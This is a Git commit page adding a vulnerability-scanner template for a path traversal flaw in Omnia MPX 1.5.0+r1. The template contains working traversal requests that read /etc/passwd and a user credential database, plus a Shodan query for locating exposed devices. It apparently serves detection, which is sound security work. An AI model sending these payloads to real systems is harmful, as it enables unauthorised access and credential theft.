Merge pull request #4979 from arafatansari/patch-37

Create mpx-lfi.yaml
patch-1
Prince Chaddha 2022-08-03 19:03:32 +05:30 committed by GitHub
commit 53a2f6b0f9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: omnia-mpx-lfi
info:
name: Omnia MPX 1.5.0+r1 - Path Traversal
author: arafatansari,ritikchaddha
severity: high
description: |
Omnia MPX 1.5.0+r1 is vulnerable to Path Traversal.
reference:
- https://www.exploit-db.com/exploits/50996
metadata:
verified: true
shodan-query: http.html:"Omnia MPX"
tags: omnia,mpx,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: body
words:
- '"username":'
- '"password":'
- '"id":'
condition: and